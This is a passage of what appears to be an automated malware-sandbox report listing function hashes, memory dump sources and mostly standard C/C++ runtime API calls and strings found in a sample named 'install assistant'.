                                    • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                    • Instruction ID: 7582cad110a897d6030f60462cc5fc13bb7f5c223c2ed3f38b5ce76433596b6e
                                    • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                    • Instruction Fuzzy Hash: 803114277A440103C70CCE3BCC1679F91535BE466A70ECF79AC05EEF55D52CC8164544
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                    • Instruction ID: 82fd6fe14563b513cba1d6f953ecf1933a648fd62d5db317c0d737cbde87b49c
                                    • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                    • Instruction Fuzzy Hash: 5F219077320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C385
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                    • Instruction ID: 586d1611c2944f6ff8ec719a6ba5b5ee99bb7d24fa36e45ac37272567eb03e25
                                    • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                    • Instruction Fuzzy Hash: 10E08C72A12238EBCB25EB88CA00E8AB3ECEB48B45F210096B501D3610D270DE04C7E0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                    • Instruction ID: 0ac7678a75ce2e63ffd32215bc481eafa9b301a584c0df26a37375d5a2789853
                                    • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                    • Instruction Fuzzy Hash: D9C08CE312810057C702EA2599C0BAAF7A37360330F228C2EA0A2F7E43C328C0648111
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                    • API String ID: 3519838083-609671
                                    • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                    • Instruction ID: b9af47bec1ed35215598a9ddeeb01b926eb6adad92fef66eac0e2c9dc8f7092b
                                    • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                    • Instruction Fuzzy Hash: 81D1D131B04209DFCB11CFA4D991BEEB7B5FF25308F244059F055A3A50DB78AA08CBA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv$H_prolog
                                    • String ID: >WJ$x$x
                                    • API String ID: 2300968129-3162267903
                                    • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                    • Instruction ID: 471d2e47f70a81919cf91afa81f08ff5531db91a2ac0d2913c487f313e138e5f
                                    • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                    • Instruction Fuzzy Hash: 5512677190021DEFDF18DFA4C980AEDBBB5BF28318F248169E919BB650CB359945CF50
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169B07
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6C169B0F
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169B98
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6C169BC3
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169C18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 1e994e09929bb42ddec72a6bea6b23f724bb039f2eb8e3dbb64aca8e7357b0ba
                                    • Instruction ID: b4e9847f7c4103a67ceed1446b383dc70b12d81261803f1734472701bd025b46
                                    • Opcode Fuzzy Hash: 1e994e09929bb42ddec72a6bea6b23f724bb039f2eb8e3dbb64aca8e7357b0ba
                                    • Instruction Fuzzy Hash: AF41CF34A112189BCF00DF6AC8A4B9E7BB5BF46328F248155E8149BF91D735DA25CFA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: 5f59daaa7e12f37cea1f1b06bb2c4ee40a27fb1762432486da01b7a434977dcc
                                    • Instruction ID: ec7a78ed77cc2d5359a946ce81f0bf0a8cce925e597c0029b4c5c2ceb2767ddc
                                    • Opcode Fuzzy Hash: 5f59daaa7e12f37cea1f1b06bb2c4ee40a27fb1762432486da01b7a434977dcc
                                    • Instruction Fuzzy Hash: B521EE32A1A219AFDB318B29CC54B0F3B649F17768F2606D1E825F7A80DB30DD0085F0
                                    APIs
                                    • GetConsoleCP.KERNEL32(?,6C17B0D0,?), ref: 6C17BEF9
                                    • __fassign.LIBCMT ref: 6C17C0D8
                                    • __fassign.LIBCMT ref: 6C17C0F5
                                    • WriteFile.KERNEL32(?,6C185AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C17C13D
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C17C17D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C17C229
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 06ce2418d600c451a6b862ed5967815e6c1aeddf87e4d977f03e9347d1f59e57
                                    • Instruction ID: b4cb1aab28f0492a15f3b592c120777a13b57c572da75c2717811ca60fc4acf1
                                    • Opcode Fuzzy Hash: 06ce2418d600c451a6b862ed5967815e6c1aeddf87e4d977f03e9347d1f59e57
                                    • Instruction Fuzzy Hash: 4FD1AC75E012489FCF21DFE8C890AEDBBB5BF49314F24416AE855BB242D731A946CF60
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C032F95
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C032FAF
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C032FD0
                                    • __Getctype.LIBCPMT ref: 6C033084
                                    • std::_Facet_Register.LIBCPMT ref: 6C03309C
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0330B7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                    • String ID:
                                    • API String ID: 1102183713-0
                                    • Opcode ID: 6dee1a0e99ac83b0143fe7dadba8716b373804e15c4fbb9d03b2407b69ef199b
                                    • Instruction ID: b760842003ef29dd9c694e99bf037d2fb489ea839c017e03234616a22a521751
                                    • Opcode Fuzzy Hash: 6dee1a0e99ac83b0143fe7dadba8716b373804e15c4fbb9d03b2407b69ef199b
                                    • Instruction Fuzzy Hash: 11415871E002298FCB10CF86C864BAEB7F0FB49714F058129D859ABB90D735A945CFE0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv$__aullrem
                                    • String ID:
                                    • API String ID: 2022606265-0
                                    • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                    • Instruction ID: 980c2aa9b7b60f6f01f566c5f5c6182cdaa9a688c21477cdce5096516a1f9ce7
                                    • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                    • Instruction Fuzzy Hash: 8B21E17490462DFBDF208ED68E40DCF7F79EF51BA8F208226B92461A90D6718D51CAA1
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1AA6F1
                                      • Part of subcall function 6C1B9173: __EH_prolog.LIBCMT ref: 6C1B9178
                                    • __EH_prolog.LIBCMT ref: 6C1AA8F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: IJ$WIJ$J
                                    • API String ID: 3519838083-740443243
                                    • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                    • Instruction ID: a98f7eb18c482b1786142761f7f6bee19bf2e32a01398809fe075daf6475b3d6
                                    • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                    • Instruction Fuzzy Hash: 8E71AE34900255DFDB18DFA4C484BEDB7B5BF14308F1080A9D859ABB91CB79AA4ECF91
                                    APIs
                                    • _free.LIBCMT ref: 6C185ADD
                                    • _free.LIBCMT ref: 6C185B06
                                    • SetEndOfFile.KERNEL32(00000000,6C1846EC,00000000,6C17B0D0,?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000), ref: 6C185B38
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000,?,?,?,?,00000000,?), ref: 6C185B54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFileLast
                                    • String ID: 8Q
                                    • API String ID: 1547350101-4022487301
                                    • Opcode ID: efc15d91400db206b03fb2c45fa8feb48fae8844d214638b1e2fa3fe6fc6a9fd
                                    • Instruction ID: a675ea6def47beebd9b626351842968d25b9109af2d5badca6c79b930ee1ab93
                                    • Opcode Fuzzy Hash: efc15d91400db206b03fb2c45fa8feb48fae8844d214638b1e2fa3fe6fc6a9fd
                                    • Instruction Fuzzy Hash: 2F41E73250A605ABFB019BA9CCC0BDE3BB6EF55328F240141F426E7B90DB38C8044F20
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1BE41D
                                      • Part of subcall function 6C1BEE40: __EH_prolog.LIBCMT ref: 6C1BEE45
                                      • Part of subcall function 6C1BE8EB: __EH_prolog.LIBCMT ref: 6C1BE8F0
                                      • Part of subcall function 6C1BE593: __EH_prolog.LIBCMT ref: 6C1BE598
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: &qB$0aJ$A0$XqB
                                    • API String ID: 3519838083-1326096578
                                    • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                    • Instruction ID: cba3a998ee0622b669978a1ad2804b5dca109f13092d5bf1e8cc65c0e477e5fe
                                    • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                    • Instruction Fuzzy Hash: 76218671D01258EECB08DBE4D994AEDBBB5AF25318F20406AE41677780DB781F0CCB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: J$0J$DJ$`J
                                    • API String ID: 3519838083-2453737217
                                    • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                    • Instruction ID: 5c2672b0739af91b2f074c69caccc37212cf2ebe23941b7b8616e5e1439addf7
                                    • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                    • Instruction Fuzzy Hash: B011B0B0900B648FC7209F5AC45469AFBE4BFA5708B10C95FC4AA97B50C7F8A509CB99
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C16F1B4,00000000,?,6C16F235,6C169C49,00000003,00000000), ref: 6C16F13F
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C16F152
                                    • FreeLibrary.KERNEL32(00000000,?,?,6C16F1B4,00000000,?,6C16F235,6C169C49,00000003,00000000), ref: 6C16F175
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: fe926a97b7b2a70e59522f55570393399a39bf2e1726c2a68da2d1a281d49313
                                    • Instruction ID: bfd003bb0e66ba72697e2e7723a300d4526e8054c3bb0d785a74b2b669aebca2
                                    • Opcode Fuzzy Hash: fe926a97b7b2a70e59522f55570393399a39bf2e1726c2a68da2d1a281d49313
                                    • Instruction Fuzzy Hash: 77F01C31601519FBDF029F92C90DB9E7A79EB067AAF214064F826A2550CB708E10EA91
                                    APIs
                                    • __EH_prolog3.LIBCMT ref: 6C16732E
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C167339
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1673A7
                                      • Part of subcall function 6C167230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C167248
                                    • std::locale::_Setgloballocale.LIBCPMT ref: 6C167354
                                    • _Yarn.LIBCPMT ref: 6C16736A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                    • String ID:
                                    • API String ID: 1088826258-0
                                    • Opcode ID: 3b6e47d8b99a7b426f169f07a273df7047b30f9dbec49847af42f47dbc99bee3
                                    • Instruction ID: 39f3c951b6ce12469f6feda033472cda66e7465944e299b869f04cbcd3e0b746
                                    • Opcode Fuzzy Hash: 3b6e47d8b99a7b426f169f07a273df7047b30f9dbec49847af42f47dbc99bee3
                                    • Instruction Fuzzy Hash: FA01DF75A002108BDB06DF22C858ABC77B1FF96304B15804ADC0297BC0CF34AA6ACFE1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $!$@
                                    • API String ID: 3519838083-2517134481
                                    • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                    • Instruction ID: adb3246fe3c82fdb962d3cc4a0eede5cb150005512dcf6a57001e82097ec5603
                                    • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                    • Instruction Fuzzy Hash: 4A126C74A0564DDFDB04CFA4C490ADDBBB1BF09308F24846AE945EBB52DB34E945CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog__aulldiv
                                    • String ID: $SJ
                                    • API String ID: 4125985754-3948962906
                                    • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                    • Instruction ID: dc81c77298643bdeed03874748cf812d7f4539b83ec912e0fc2e4c54657c456a
                                    • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                    • Instruction Fuzzy Hash: CFB13BB1E00209DFCB14CF99C9949AEBBB1FF58314B60852EE419B7B50D734AA49CF50
                                    APIs
                                      • Part of subcall function 6C167327: __EH_prolog3.LIBCMT ref: 6C16732E
                                      • Part of subcall function 6C167327: std::_Lockit::_Lockit.LIBCPMT ref: 6C167339
                                      • Part of subcall function 6C167327: std::locale::_Setgloballocale.LIBCPMT ref: 6C167354
                                      • Part of subcall function 6C167327: _Yarn.LIBCPMT ref: 6C16736A
                                      • Part of subcall function 6C167327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1673A7
                                      • Part of subcall function 6C032F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C032F95
                                      • Part of subcall function 6C032F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C032FAF
                                      • Part of subcall function 6C032F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C032FD0
                                      • Part of subcall function 6C032F60: __Getctype.LIBCPMT ref: 6C033084
                                      • Part of subcall function 6C032F60: std::_Facet_Register.LIBCPMT ref: 6C03309C
                                      • Part of subcall function 6C032F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0330B7
                                    • std::ios_base::_Addstd.LIBCPMT ref: 6C03211B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
